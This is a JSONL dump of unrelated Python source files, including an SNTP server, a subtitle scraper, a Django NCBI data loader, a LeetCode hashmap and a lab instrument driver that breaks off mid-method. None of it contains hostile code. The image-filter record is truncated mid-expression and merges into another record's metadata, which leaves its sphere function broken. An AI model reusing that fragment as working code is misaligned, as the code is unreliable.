+{"seq_id":"215893943","text":"#!/usr/bin/python3\n\nimport sys\nimport os\nimport logging\nimport socket\nimport time\nimport datetime\nimport struct\nfrom argparse import ArgumentParser\nfrom concurrent.futures import ThreadPoolExecutor\n\n\n_system_epoch = datetime.date(*time.gmtime(0)[0:3])\n_sntp_epoch = datetime.date(1900, 1, 1)\nTIME_SINCE_1900 = (_system_epoch - _sntp_epoch).days * 24 * 3600\n\nMAX_WORKERS = 3\n\nclass ServerSNTP(ThreadPoolExecutor):\n\n HOST = '0.0.0.0'\n PORT = 8000\n PKT_FORMAT = \"!BBBbII4sQQQQ\" # Struct format\n\n def __init__(self, offset):\n ThreadPoolExecutor.__init__(self, max_workers=MAX_WORKERS)\n self._offset = offset\n self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM,\n socket.getprotobyname(\"UDP\"))\n logging.debug(\"Server initialized\")\n\n def start(self):\n self._sock.bind((ServerSNTP.HOST, ServerSNTP.PORT))\n while True:\n query_data, dest = self._sock.recvfrom(1024)\n logging.info(\"Query received\")\n answer = self.create_answer(query_data)\n self.submit(self._send_answer, answer, dest)\n\n def create_answer(self, query_data):\n current_time = self.time\n try:\n data = struct.unpack(ServerSNTP.PKT_FORMAT, query_data)\n LI_VN_MODE = 0b11100100 # Leap Indicator: alarm condition, Version Number: 4, Mode: server\n stratum = 2\n poll, precision, root_delay, root_dispersion = 4, 0, 0, 0\n reference_identifier = b\"LOCL\"\n reference_timestamp = 0\n originate_timestamp = data[10]\n receive_timestamp = current_time\n transmit_timestamp = self.time\n answer = struct.pack(ServerSNTP.PKT_FORMAT,\n LI_VN_MODE, stratum, poll, precision,\n root_delay,\n root_dispersion,\n reference_identifier,\n reference_timestamp,\n originate_timestamp,\n receive_timestamp,\n transmit_timestamp)\n return answer\n except struct.error:\n logging.info(\"Bad packet received\")\n return b''\n\n def _send_answer(self, data, dest):\n self._sock.sendto(data, dest)\n\n @property\n def time(self):\n return int(time.time() + TIME_SINCE_1900 + self._offset) * 2**32\n\n def shutdown(self, wait=True):\n logging.debug(\"Shutting down\")\n self._sock.close()\n ThreadPoolExecutor.shutdown(self, wait)\n\n\ndef parse_args(args):\n parser = ArgumentParser(description=\"Sntp server\")\n parser.add_argument(\"-l\", \"--log-level\", action='store', dest=\"log_lvl\",\n default=\"CRITICAL\",\n help=\"Logging level. Should be one of: CRITICAL,\"\n \"ERROR, WARNING, INFO, DEBUG.\")\n # if len(args) == 0:\n # print(\"Arguments not found\")\n # parser.print_help()\n # return None\n return parser.parse_args(args)\n\n\ndef main():\n args = parse_args(sys.argv[1:])\n if args is None:\n sys.exit(1)\n logging.basicConfig(level=args.log_lvl)\n server = None\n config_file = \"config.cfg\"\n if config_file not in os.listdir():\n print(f\"{config_file} doesn't exists\")\n sys.exit(1)\n with open(config_file, mode='r') as f:\n offset = int(f.readline().rstrip(\"\\n\"))\n try:\n server = ServerSNTP(offset)\n server.start()\n except KeyboardInterrupt:\n logging.warning(\"Interupted\")\n sys.exit(0)\n except Exception as e:\n logging.exception(e)\n sys.exit(2)\n finally:\n if server:\n server.shutdown()\n\n\nif __name__==\"__main__\":\n main()\n","sub_path":"tasks/sntp-serever/sntp_server.py","file_name":"sntp_server.py","file_ext":"py","file_size_in_byte":3674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"128530101","text":"import numpy as np\r\nimport csv\r\nimport yaml\r\n\r\n\r\n\r\nclass Operation4:\r\n def __init__(self):\r\n self.num_question = 10 # the number of question\r\n self.num_digit = 1 # the number of digit\r\n self.isNegative = False # negative value question is OK?\r\n self.isDecimal = False # decimal question is OK?\r\n\r\n\r\n def pre_calc(self, admd):\r\n if self.isNegative == True:\r\n lim_l = -1 * 10**(self.num_digit)+1\r\n lim_h = 10**(self.num_digit)-1\r\n else:\r\n lim_l = 10**(self.num_digit-1)\r\n lim_h = 10**(self.num_digit)-1\r\n\r\n if self.isDecimal == True:\r\n np.set_printoptions(precision=2)\r\n arr = (lim_h - lim_l) * np.random.rand(self.num_question, 2) + lim_h\r\n else:\r\n arr = np.random.randint(lim_l, lim_h, (self.num_question, 2))\r\n\r\n if self.isNegative == False and admd is 'diff': # if diff ans is negative\r\n # diff_positive = np.where(arr[:, 0] >= arr[:, 1])\r\n diff_negative = np.where(arr[:, 0] < arr[:, 1])\r\n\r\n for i in diff_negative[0]:\r\n arr_index = arr[i]\r\n arr[i] = arr_index[1], arr_index[0]\r\n\r\n return arr\r\n\r\n\r\n def calc_ope4(self, admd):\r\n calc_formula = self.pre_calc(admd)\r\n\r\n if admd == 'add':\r\n calc_result = np.array([np.sum(calc_formula, axis=1)]).T\r\n calc_info = 'add'\r\n calc_symbol = '+'\r\n \r\n elif admd == 'diff':\r\n calc_result = np.array(np.diff(calc_formula, axis=1) * (-1))\r\n calc_info = 'diff'\r\n calc_symbol = '-'\r\n\r\n elif admd == 'multiply':\r\n calc_result = np.array([calc_formula[:,0] * calc_formula[:,1]]).T\r\n calc_info = 'multiply'\r\n calc_symbol = '*'\r\n\r\n elif admd == 'div':\r\n calc_result = np.array([calc_formula[:,0] / calc_formula[:,1]]).T\r\n calc_info = 'div'\r\n calc_symbol = '/'\r\n \r\n else:\r\n return 'ERROR', 'CHECK ARGUMENT'\r\n\r\n # reshape \r\n output_formula = np.array([calc_formula[:, 0], np.repeat(calc_symbol, self.num_question), calc_formula[:, 1], np.repeat('=', self.num_question)], dtype='str').T\r\n output_calc = np.concatenate([output_formula, calc_result], axis=1)\r\n return calc_info, output_calc\r\n\r\n\r\n\r\ndef export_tsv(read_data):\r\n f_name = 'export_tsv'\r\n with open(f_name, mode='w', encoding='utf-8') as fo:\r\n tsv_writer = csv.writer(fo, delimiter='\\t')\r\n tsv_writer.writerows(read_data)\r\n\r\n\r\ndef export_yaml():\r\n f_name = 'export_yaml'\r\n\r\n\r\ndef main():\r\n operation4class = Operation4()\r\n calc_info, output_calc = operation4class.calc_ope4('div')\r\n print(calc_info,'\\n', output_calc)\r\n export_tsv(output_calc)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"172918598","text":"class Node:\n def __init__(self, val, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n @staticmethod\n def serialize(node):\n if node is None:\n return \"None\"\n return node.val + \"-\" + Node.serialize(node.left) + \"-\" + Node.serialize(node.right)\n\n @staticmethod\n def deserialize(s=None, vals=None):\n if s is None and vals is None:\n raise Exception(\"Both parameters are None.\")\n if vals is None and s:\n vals = s.split('-') # convert serialize string to array\n val = vals.pop(0) # get and remove the first index\n\n if val == \"None\":\n return None\n\n node = Node(val)\n node.left = Node.deserialize(vals=vals)\n node.right = Node.deserialize(vals=vals)\n\n return node\n \nif __name__ == \"__main__\":\n node = Node('root', Node('left', Node('left.left')), Node('right'))\n assert Node.deserialize(Node.serialize(node)).left.left.val == \"left.left\", \"TEST FAILED\"\n print(\"TEST PASSED\")\n ","sub_path":"2019.03.16/python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"413595798","text":"import numpy as np\nfrom toolz.curried import curry, pipe\n\ntry:\n import edt\n transform_edt = curry(edt.edt)(black_border=False)\nexcept ImportError:\n import scipy.ndimage.morphology as morph\n transform_edt = morph.distance_transform_edt\n print(\"you can install edt for speed-up as - \")\n print(\"pip install edt\")\n pass\n\ntry:\n import torch\n torch_rfft = curry(torch.rfft) # pylint: disable=invalid-name\n torch_irfft = curry(torch.irfft) # pylint: disable=invalid-name\n\n def conjugate(x):\n \"\"\"\n returns the conjugate of a complex torch tensor\n \"\"\"\n y = torch.empty_like(x)\n y[..., 1] = x[..., 1] * -1\n y[..., 0] = x[... , 0]\n return y\n\n @curry\n def mult(x1, x2):\n \"\"\"\n returns the product of complext torch tensors x1 and x2\n \"\"\"\n y = torch.empty_like(x1)\n y[..., 0] = x1[..., 0]*x2[..., 0] - x1[..., 1]*x2[..., 1]\n y[..., 1] = x1[..., 0]*x2[..., 1] + x1[..., 1]*x2[..., 0]\n return y\n\n @curry\n def imfilter(f_data1, f_data2):\n \"\"\"\n For convolving f_data1 with f_data2 using PyTorch\n \"\"\"\n ndim = f_data1.ndim\n f_data1 = torch.from_numpy(f_data1).double()\n f_data2 = torch.from_numpy(f_data2).double()\n\n rfft = torch_rfft(signal_ndim=ndim)\n irfft = torch_irfft(signal_ndim=ndim)\n\n return pipe(f_data1,\n rfft,\n lambda x: mult(x, conjugate(rfft(f_data2))),\n irfft,\n lambda x: np.fft.fftshift(x))\nexcept ImportError:\n @curry\n def imfilter(x_data, f_data):\n \"\"\"\n to convolve f_data over x_data\n \"\"\"\n return pipe(f_data,\n lambda x: np.fft.ifftshift(x),\n lambda x: np.fft.fftn(x),\n lambda x: np.conj(x) * np.fft.fftn(x_data),\n lambda x: np.fft.ifftn(x),\n lambda x: np.absolute(x))\n print(\"you can install torch for speed-up as - \")\n print(\"conda install pytorch-cpu torchvision-cpu -c pytorch\")\n pass\n\n\ndef sphere(r=10):\n \"\"\"\n args: radius of the sphere\n\n returns: A 3D cubic matric of dim (2*r+1)^1\n \"\"\"\n return pipe(2*r+1,\n lambda x: np.mgrid[:x,:x,:x],\n lambda xx: (xx[0]-r)**2 + (xx[1]-r)**2+(xx[2]-r)**2,\n lambda x: (x-fix.py","file_name":"d30554bc90f36d7f7835bd21fe5c5b86169b5432--fix.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"524707407","text":"import datetime\nfrom django.core.management.base import BaseCommand\nfrom lib import genehasher\nfrom lib.fileUtils import downloadFromUrl, gunzip\nimport subprocess\nimport os\nfrom network.models import Cdd\nfrom django.db import connection\n\nimport pickle\nfrom lib import genehasher as gh\n\nimport pprint\npp = pprint.PrettyPrinter(indent=4, compact=True, depth=2)\n\npath = 'data/protein/'\npath2 = 'data/pickles/'\nfiles = [ 'ftp://ftp.ncbi.nih.gov/pub/mmdb/cdd/family_superfamily_links',\n 'ftp://ftp.ncbi.nih.gov/pub/mmdb/cdd/cddid.tbl.gz',\n path+'family_superfamily_links.txt',\n path+'cddid.tbl.gz',\n path+'cddid.txt',\n path+'cdd_latest',\n path2+'cdd_latest'\n]\n\nclass Command(BaseCommand):\n args = ''\n help = 'our help string comes here'\n\n def _download_from_ncbi_cdd( self ):\n\n downloadFromUrl( files[0], files[2] )\n downloadFromUrl( files[1], files[3] )\n gunzip( files[3], path, files[4] )\n\n def _load_dbtable( self ):\n\n # load data into entrez table\n Cdd.objects.all().delete()\n with connection.cursor() as c:\n c.execute( 'LOAD DATA LOCAL INFILE %s REPLACE INTO TABLE tcga.cdd FIELDS TERMINATED BY \"\\t\" ignore 1 lines' + \n ' (PSSM, ACC, NAME, DESCRIPTION, ROOT, SUB, SUPER)', [ files[5] ] )\n\n Cdd.objects.filter( super = 0 ).update(super = None) \n \n def _parse_file( self ):\n\n cdd = dict()\n with open( files[2] ) as cddTree:\n with open( files[4] ) as cddAttr:\n cdd = gh.createCDDtree( cddTree, cddAttr, False )\n\n #pp.pprint(cdd['ByPssm']) \n pickle.dump( cdd, open( files[6], 'wb' ))\n fout = open( files[5], 'wt' )\n fout.write( '\\t'.join([ 'Pssm', 'Acc', 'Name', 'Desc', 'Root', 'Sub', 'Super' ]) + \"\\n\" )\n for d in list( cdd['ByPssm'].values()) :\n sub = ''\n if type( d['Sub']) is list:\n# print( 'yes, sub is a list' )\n sub = ';'.join( [ d['Sub'][i]['Pssm'] for i in range(len(d['Sub'])) ] )\n\n# print( type(d['Sub']) )\n sup = '' #d['Root']['Pssm']\n if isinstance( d['Super'], dict ):\n# print('yes, super is a dict')\n sup = d['Super']['Pssm']\n\n fout.write( '\\t'.join([ d['Pssm'], d['Acc'], d['Name'], d['Desc'],\n d['Root']['Pssm'], sub, sup ]) + \"\\n\")\n# print( type(d['Super']) )\n# print( d['Desc'])\n fout.close()\n\n \n def handle(self, *args, **options):\n print( '\\n\\n\\n\\n############################ ' + 'update CDD data on ' + str(datetime.date.today()))\n self._download_from_ncbi_cdd()\n self._parse_file()\n self._load_dbtable()\n","sub_path":"management/commands/load_cdd_data.py","file_name":"load_cdd_data.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"608708176","text":"import chardet\nimport os.path\nimport glob\nimport sys\nimport re\n\ndef readdir(path, confidence=0.6):\n '''path : Specific Directory Path and Filename Extension.\n confidence[0.0-1.0] : Specific the detect encode confidence.\n File will be ignore if below this value.\n '''\n title = []\n documents = []\n unknown = 0\n for file in glob.glob(path):\n with open(file, 'rb') as f:\n text = f.read()\n encode = chardet.detect(text)\n if (encode['confidence'] < confidence):\n if(unknown == 0):\n print('Unknown encode file :')\n unknown += 1\n print(file)\n else:\n title.append(os.path.splitext(os.path.basename(file))[0])\n documents.append(text.decode(encode['encoding']))\n print()\n if(unknown > 0):\n print('Number of unknown encoding files :', unknown)\n print('Number of read files :', len(documents))\n print('Number of files :', len(glob.glob(path)))\n return title, documents\n\n\ndef savetofile(path, data, confidence=0.6, default_encode = 'utf-8'):\n '''path : save data to file, specific file_path file_name, and file_extension.\n data : input data to save.\n confidence: detect encode confidence throttle\n default_encode: use default_encode if confidence lower than throttle\n '''\n if os.path.isfile(path):\n with open(path, 'rb') as f:\n text = f.read()\n encode = chardet.detect(text)\n if (encode['confidence'] < confidence):\n print('Unknown encode file! Use default encode: ', default_encode)\n original = list(map(str.strip, open(path, 'r+', encoding=default_encode).readlines()))\n else:\n original = list(map(str.strip, open(path, 'r+', encoding=encode['encoding']).readlines()))\n else:\n original = []\n original = sorted(original)\n with open(path, 'a+') as f:\n for i in range(len(data)):\n text = data[i]\n for i in text:\n if i not in original:\n f.write(i + '\\n')\n return\n \n","sub_path":"finaceKAM/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"157829455","text":"#!/usr/bin/env python\nimport re\nimport requests\nimport bs4\nimport os\nimport utils\n\n\ndef getSubsPage(showTitle, season):\n \"\"\"\n Gets the link of the available subtitles of the show.\n :param showTitle: Name of the show\n :param season: Season number {S\\d\\d}\n :returns: addic7ed.com link for the specified season of the show\n \"\"\"\n title_readable = showTitle.replace('_', ' ');\n season_target = int(filter(str.isdigit, season))\n\n with requests.session() as c:\n response = c.get('http://www.addic7ed.com/')\n soup = bs4.BeautifulSoup(response.text, 'html.parser')\n for element in soup.find_all('option'):\n if re.compile(title_readable, flags=re.IGNORECASE).match(element.string):\n show_id = element.get('value')\n main_page = 'http://www.addic7ed.com/ajax_loadShow.php?show={0}&season={1}&langs=|1|&hd=1&hi=undefined'.format(show_id, season_target)\n utils.printDebug(main_page)\n return main_page\n else:\n print('Show with title \\'{0}\\' could not be found in addic7ed.com'.format(title_readable))\n\ndef getAvailableReleases(showTitle, season, episode):\n \"\"\"\n Returns the available releases for the specified episode of the show.\n :param showTitle: Name of the show\n :param season: Season number {S\\d\\d}\n :param episode: Episode number {E\\d\\d}\n :returns: list of available releases for the passed episode of the show\n \"\"\"\n season_target = int(filter(str.isdigit, season))\n episode_target = int(filter(str.isdigit, episode))\n\n releases = set()\n main_page = getSubsPage(showTitle, season)\n if main_page:\n with requests.session() as c:\n response = c.get(main_page)\n soup = bs4.BeautifulSoup(response.text, 'html.parser')\n for element in soup.find_all('tr', attrs={'class':'epeven completed'}):\n attributes = element.find_all('td')\n season_fetched = int(attributes[0].text)\n if season_fetched == season_target:\n episode_fetched = int(attributes[1].text)\n if episode_fetched == episode_target:\n releases.add(attributes[4].text)\n\n utils.printDebug(str(list(releases)))\n return releases\n\n\ndef getSubtitle(showTitle, season, episode, release):\n \"\"\"\n Downloads subtitle in English language for the specified episode of the show for the given release.\n :param showTitle: Name of the show\n :param season: Season number {S\\d\\d}\n :param episode: Episode number {E\\d\\d}\n :param release: name of the release\n \"\"\"\n # TODO return value?\n title_readable = showTitle.replace('_', ' ');\n season_target = int(filter(str.isdigit, season))\n episode_target = int(filter(str.isdigit, episode))\n\n main_page = getSubsPage(showTitle, season)\n if main_page:\n with requests.session() as c:\n response = c.get(main_page)\n\n soup = bs4.BeautifulSoup(response.text, 'html.parser')\n for element in soup.find_all('tr', attrs={'class':'epeven completed'}):\n attributes = element.find_all('td')\n season_fetched = int(attributes[0].text)\n if season_fetched == season_target:\n episode_fetched = int(attributes[1].text)\n if episode_fetched == episode_target:\n if re.compile(release, flags=re.IGNORECASE).match(attributes[4].text):\n link_id = attributes[9].find('a').get('href')\n utils.printDebug('Subtitle download link: http://www.addic7ed.com' + link_id)\n\n subtitle = c.get('http://www.addic7ed.com' + link_id, headers={'referer': main_page})\n\n download_path, filename = utils.searchMediaDownloadPath([title_readable, season, episode, release])\n\n if download_path == '':\n utils.printDebug('Subtitle is being saved to the default Download path.')\n download_path = os.path.expanduser('~/Downloads')\n\n if filename == '':\n filenames = re.findall(\"filename=(.+)\", subtitle.headers['content-disposition'])\n filename = filenames[0].replace('\"', '')\n # Replace the extension with '.srt'\n filename = os.path.splitext(filename)[0] + '.srt'\n\n with open(os.path.join(download_path, filename), 'wb') as code:\n code.write(subtitle.content)\n\n print('Subtitle is downloaded succesfully.\\n(' + os.path.join(download_path, filename) + ')')\n break\n else:\n print('Subtitle could not be downloaded')\n\n\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"showTitle\", help=\"Name of the show {separated by underscores}\")\n parser.add_argument(\"season\", help=\"Season number {S\\d\\d}\")\n parser.add_argument(\"episode\", help=\"Episode number {E\\d\\d}\")\n parser.add_argument(\"release\", help=\"Name of the release\")\n parser.add_argument(\"-v\", \"--verbose\", help=\"Increase output verbosity\", action=\"store_true\")\n args = parser.parse_args()\n\n utils.verbose = args.verbose\n getSubtitle(args.showTitle, args.season, args.episode, args.release)\n","sub_path":"src/subtitledownloader.py","file_name":"subtitledownloader.py","file_ext":"py","file_size_in_byte":5521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"587909366","text":"# https://leetcode.com/problems/design-hashmap/\n\n# Design a HashMap without using any built-in hash table libraries.\n\n# Implement the MyHashMap class:\n# MyHashMap() initializes the object with an empty map.\n# void put(int key, int value) inserts a (key, value) pair into the HashMap. If the key already exists in the map, update the corresponding value.\n# int get(int key) returns the value to which the specified key is mapped, or -1 if this map contains no mapping for the key.\n# void remove(key) removes the key and its corresponding value if the map contains the mapping for the key.\n\nimport collections\n\n\nclass ListNode:\n def __init__(self, key=None, value=None, next=None):\n self.key = key\n self.value = value\n self.next = next\n\n\nclass MyHashMap:\n\n def __init__(self):\n self._hashsize = 1009\n self.hash_table = collections.defaultdict(ListNode)\n\n def put(self, key: int, value: int) -> None:\n prev_node, hash_node = self._get_node(key)\n\n # if the key doesn't exist\n if prev_node is None:\n self.hash_table[self._hash(key)] = ListNode(key, value)\n return\n\n # if the key already exists\n if hash_node:\n hash_node.value = value\n return\n\n prev_node.next = ListNode(key, value)\n\n def get(self, key: int) -> int:\n\n prev_node, hash_node = self._get_node(key)\n\n # if there's no mapping for the key\n if hash_node is None:\n return -1\n else:\n return hash_node.value\n\n def remove(self, key: int) -> None:\n hash_index = self._hash(key)\n prev_node, hash_node = self._get_node(key)\n if hash_node is None:\n return\n\n if prev_node == hash_node:\n if hash_node.next is None:\n self.hash_table[hash_index] = ListNode()\n else:\n self.hash_table[hash_index] = hash_node.next\n return\n\n prev_node.next = hash_node.next\n del hash_node\n\n def _get_node(self, key: int) -> tuple:\n prev_node = hash_node = self.hash_table[self._hash(key)]\n\n # if there's no mapping for the key\n if hash_node.value is None:\n return None, None\n\n # if there's mapping for the key\n while hash_node:\n if hash_node.key == key:\n return prev_node, hash_node\n prev_node, hash_node = hash_node, hash_node.next\n\n return prev_node, hash_node\n\n def _hash(self, key: int) -> int:\n # hash function\n hashval = key % self._hashsize\n return hashval\n\n\n# test case\nobj = MyHashMap()\nobj.put(2, 1)\nprint(obj.get(2))\nobj.put(10002, 2)\nprint(obj.get(2))\nobj.remove(10002)\nprint(obj.get(2))\nprint(obj.get(10002))\n","sub_path":"LeetCode/6. 해시 테이블/706-design-hashmap.py","file_name":"706-design-hashmap.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"606082478","text":"#!/usr/bin/env python\nimport importlib\nimport logging\nfrom math import acos, atan2, copysign, cos, sin, sqrt\nfrom multiprocessing import RLock\nfrom threading import Event, Thread\nfrom time import sleep\nfrom typing import Dict, List, Tuple\n\nimport InstrumentDriver\nimport numpy as np\nfrom scipy import constants as cs\n\nlogger = logging.getLogger(__name__)\n# handler = logging.FileHandler(\n# r\"C:\\Users\\Shabani_Lab\\Documents\\MagnetDebug\\log.txt\", mode=\"w\"\n# )\n# handler.setLevel(logging.DEBUG)\n# logger.addHandler(handler)\n# logger.critical(\"Test handler\")\n\n\nclass BiasGenerator:\n \"\"\"Bias current generator for VICurveTracer.\"\"\"\n\n def __init__(self, address):\n raise NotImplementedError\n\n def close(self):\n raise NotImplementedError\n\n def select_range(self, voltage, load_resistance):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n def current_value(self):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n def goto_value(self, value, slope):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n def prepare_ramps(self, ramps: List[Tuple[float, float, float]]):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n def start_ramp(self, index):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n def is_ramping(self):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n def get_admissible_reset_rate(self, reset_rate, amplitude):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n def get_sweep_resolution(self) -> Dict[str, float]:\n \"\"\" \"\"\"\n raise NotImplementedError\n\n def support_continuous_sweeping(self) -> bool:\n \"\"\"\"\"\"\n raise NotImplementedError\n\n\nclass VoltMeter:\n \"\"\"Voltmeter for VICurveTracer.\"\"\"\n\n def __init__(self, address):\n raise NotImplementedError\n\n def close(self):\n raise NotImplementedError\n\n def list_ranges(self):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n def get_range(self):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n def set_range(self, value):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n # Continuous or point by point\n def set_acquisition_mode(self, value):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n def get_averaging_time(self):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n def set_averaging_time(self, value):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n def list_acquisition_rates(self):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n def get_acquisition_rate(self):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n def set_acquisition_rate(self, value):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n def prepare_acquistion(self, points):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n def arm_device(self):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n def wait_for_data_ready(self):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n def retrieve_data(self):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n def read_value(self):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n\nclass LockIn:\n \"\"\"\"\"\"\n\n def __init__(self, address):\n raise NotImplementedError\n\n def get_amplitude(self):\n raise NotImplementedError\n\n def set_amplitude(self, value):\n raise NotImplementedError\n\n def list_tcs(self):\n \"\"\"\"\"\"\n raise NotImplementedError\n\n def get_tc(self):\n raise NotImplementedError\n\n def set_tc(self, value):\n raise NotImplementedError\n\n def get_frequency(self):\n raise NotImplementedError\n\n def set_frequency(self, value):\n raise NotImplementedError\n\n def read_value(self):\n \"\"\"Read a complex value from the lock-in.\n\n This method should not wait before taking a measurement.\n\n The framework ensures a proper wait time.\n\n \"\"\"\n raise NotImplementedError\n\n\nclass Driver(InstrumentDriver.InstrumentWorker):\n \"\"\"This class implements the VICurveTracer driver.\n\n This assumes that the source will trigger the meter when starting a ramp.\n\n Using the Yoko GS200 and the Keithley 6500 we can expect the bias current\n to be offset by 1-3% of the max value.\n\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._source: BiasGenerator = None\n self._meter1: VoltMeter = None\n self._meter2: VoltMeter = None\n self._li1: LockIn = None\n self._li2: LockIn = None\n self._lock = RLock()\n # In Point by point (with Lock-in) this is used to store the LI trace\n # acquired at the same time as the IV.\n self._bias = None\n self._IV_curve2 = None\n self._realbias1 = None\n self._realbias2 = None\n self._didv_trace1 = None\n self._didv_trace2 = None\n self._li_trace1 = None\n self._li_trace2 = None\n # Padding points help overcome issues with respect of the ramp by the\n # source\n self._padding_points = 0\n\n def performOpen(self, options={}):\n \"\"\"Perform the operation of opening the instrument connection.\"\"\"\n super().performOpen(options)\n with self._lock:\n # Get the acquisition mode\n acq_mode = self.getValue(\"Acquisition mode\")\n\n # Start the source\n s_model = self.getValue(\"Source: Model\")\n s_add = self.getValue(\"Source: VISA address\")\n cls = importlib.import_module(s_model).Driver\n self._source = cls(s_add)\n if (\n not self._source.support_continuous_sweeping()\n and acq_mode == \"Continuous\"\n ):\n acq_mode = self.setValue(\n \"Acquisition mode\", \"Point by point (without Lock-in)\"\n )\n\n # Start the meter\n m1_model = self.getValue(\"DMM1: Model\")\n m1_add = self.getValue(\"DMM1: VISA address\")\n cls = importlib.import_module(m1_model).Driver\n self._meter1 = cls(m1_add)\n\n m2_model = self.getValue(\"DMM2: Model\")\n m2_add = self.getValue(\"DMM2: VISA address\")\n cls = importlib.import_module(m2_model).Driver\n self._meter2 = cls(m2_add)\n\n # Start the lock-in\n li1_model = self.getValue(\"Lock-In1: Model\")\n li1_add = self.getValue(\"Lock-In1: VISA address\")\n if acq_mode == \"Point by point (with Lock-in)\":\n if li1_model and li1_add:\n cls = importlib.import_module(li1_model).Driver\n self._li1 = cls(li1_add)\n\n li2_model = self.getValue(\"Lock-In2: Model\")\n li2_add = self.getValue(\"Lock-In2: VISA address\")\n if acq_mode == \"Point by point (with Lock-in)\":\n if li2_model and li2_add:\n cls = importlib.import_module(li2_model).Driver\n self._li2 = cls(li2_add)\n\n else:\n raise RuntimeError(\n \"No valid information for Lock-in even though the mode \"\n \"requires a lock-in. Missing:\\n\"\n + (\"- Address\\n\" if not li_add else \"\")\n + (\"- Model\" if not li_model else \"\")\n )\n else:\n self._li1 = None\n self._li2 = None\n\n # Start the voltage lock-in\n # li_model = self.getValue(\"Lock-In: Model\")\n # li_add = self.getValue(\"Lock-In: VISA address\")\n # if acq_mode == \"Point by point (with Lock-in)\":\n # if li_model and li_add:\n # cls = importlib.import_module(li_model).Driver\n # self._li = cls(li_add)\n # else:\n # raise RuntimeError(\n # \"No valid information for Lock-in even though the mode \"\n # \"requires a lock-in. Missing:\\n\"\n # + (\"- Address\\n\" if not li_add else \"\")\n # + (\"- Model\" if not li_model else \"\")\n # )\n # else:\n # self._li = None\n\n self._change_meter_acquisition_mode(acq_mode)\n if acq_mode == \"Continuous\":\n ext = self.getValue(\"Source: extrema\")\n re_rate = self.getValue(\"Source: reset rate\")\n points = self.getValue(\"Number of points\")\n ac_rate = self.readValueFromOther(\"DMM: acquisition rate\")\n\n # Center the points in the window of acquisition and add padding\n self._prepare_ramp(ext, points, ac_rate, re_rate)\n\n def performClose(self, bError=False, options={}):\n \"\"\"Perform the close instrument connection operation.\"\"\"\n self._source.close()\n self._meter1.close()\n self._meter2.close()\n if self._li1 and self._li2:\n self._li1.close()\n self._li2.close()\n # if self._li:\n # self._li.close()\n\n def performSetValue(self, quant, value, sweepRate=0.0, options={}):\n \"\"\"Perform the Set Value instrument operation.\n\n This function should return the actual value set by the instrument\n\n \"\"\"\n q_name = quant.name\n update_ramps = False\n ext = points = ac_rate = re_rate = None\n\n if q_name in (\n \"Source: VISA address\",\n \"DMM1: VISA address\",\n \"DMM2: VISA address\",\n \"Lock-In1: VISA address\",\n \"Lock-In2: VISA address\",\n \"Source: Model\",\n \"DMM1: Model\",\n \"DMM2: Model\",\n \"Lock-In1: Model\",\n \"Lock-In2: Model\",\n \"DC Voltage divider\",\n \"AC Voltage divider\",\n \"Trans-impedance amplifier: gain\",\n \"Inline resistance 1\",\n \"Inline resistance 2\",\n \"Inline resistance 3\",\n \"Bias offset\",\n \"DMM: averaging time Lock-in\",\n ):\n pass\n\n elif q_name == \"Acquisition mode\":\n if value == \"Point by point (with Lock-in)\":\n li1_model = self.getValue(\"Lock-In1: Model\")\n li1_add = self.getValue(\"Lock-In1: VISA address\")\n if li1_model and li1_add:\n cls = importlib.import_module(li1_model).Driver\n self._li1 = cls(li1_add)\n\n li2_model = self.getValue(\"Lock-In2: Model\")\n li2_add = self.getValue(\"Lock-In2: VISA address\")\n if li2_model and li2_add:\n cls = importlib.import_module(li2_model).Driver\n self._li2 = cls(li2_add)\n\n\n else:\n raise RuntimeError(\n \"No valid information for Lock-in even though the mode \"\n \"requires a lock-in. Missing:\\n\"\n + (\"- Address\\n\" if not li_add else \"\")\n + (\"- Model\" if not li_model else \"\")\n )\n # elif value == \"Point by point (with 2 Lock-in)\":\n # li_model = self.getValue(\"Lock-In: Model\")\n # li_add = self.getValue(\"Lock-In: VISA address\")\n # 